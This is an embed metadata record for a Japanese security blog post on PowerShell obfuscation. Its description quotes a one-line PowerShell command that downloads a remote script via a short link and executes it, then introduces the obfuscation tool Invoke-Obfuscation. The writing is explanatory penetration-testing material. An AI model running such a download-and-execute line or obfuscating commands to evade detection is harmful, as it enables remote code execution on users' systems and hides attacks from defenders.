{"html":"","height":"190","version":"1.0","published":"2017-11-13 22:40:35","image_url":"https://cdn-ak.f.st-hatena.com/images/fotolife/s/security_consultant/20171113/20171113221627.png","provider_name":"Hatena Blog","description":"PowerShell\u306f\u3001Post-Exploitation\u30d7\u30ed\u30bb\u30b9\u3067\u975e\u5e38\u306b\u826f\u304f\u4f7f\u308f\u308c\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u4ee5\u4e0b\u306e\u30b3\u30de\u30f3\u30c9\u3092\u5b9f\u884c\u3059\u308b\u3068\u30ea\u30e2\u30fc\u30c8\u306b\u3042\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u53d6\u5f97\u3057\u3066\u305d\u306e\u5185\u5bb9\u3092\u5b9f\u884c\u3057\u3066\u304f\u308c\u307e\u3059\u3002 Invoke-Expression (New-Object Net.WebClient).DownloadString(\"http://bit.ly/L3g1t\") PowerShell\u306e\u96e3\u8aad\u5316\u6280\u6cd5\u306b\u3064\u3044\u3066\u306f\u69d8\u3005\u306a\u7814\u7a76\u304c\u3055\u308c\u3066\u304a\u308a\u3001\u3044\u304f\u3064\u304b\u30c4\u30fc\u30eb\u304c\u5b58\u5728\u3057\u307e\u3059\u3002\u4eca\u56de\u306f\u305d\u308c\u3092\u7d39\u4ecb\u3057\u307e\u3059\u3002 Invoke-Obfuscation Invoke-Obfuscation\u306f\u3001\u4efb\u610f\u306ePowerShell\u30b3\u30de\u30f3\u30c9\u3092\u96e3\u8aad\u5316\u3057\u3066\u304f\u308c\u2026","author_url":"https://blog.hatena.ne.jp/security_consultant/","categories":["\u30da\u30cd\u30c8\u30ec\u30fc\u30b7\u30e7\u30f3\u30fb\u30c6\u30b9\u30c8"],"title":"PowerShell\u306e\u96e3\u8aad\u5316\u306b\u3064\u3044\u3066","type":"rich","provider_url":"https://hatena.blog","url":"https://www.scientia-security.org/entry/2017/11/13/224035","blog_title":"\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b3\u30f3\u30b5\u30eb\u30bf\u30f3\u30c8\u306e\u65e5\u8a8c\u304b\u3089","author_name":"security_consultant","width":"100%","blog_url":"https://www.scientia-security.org/"}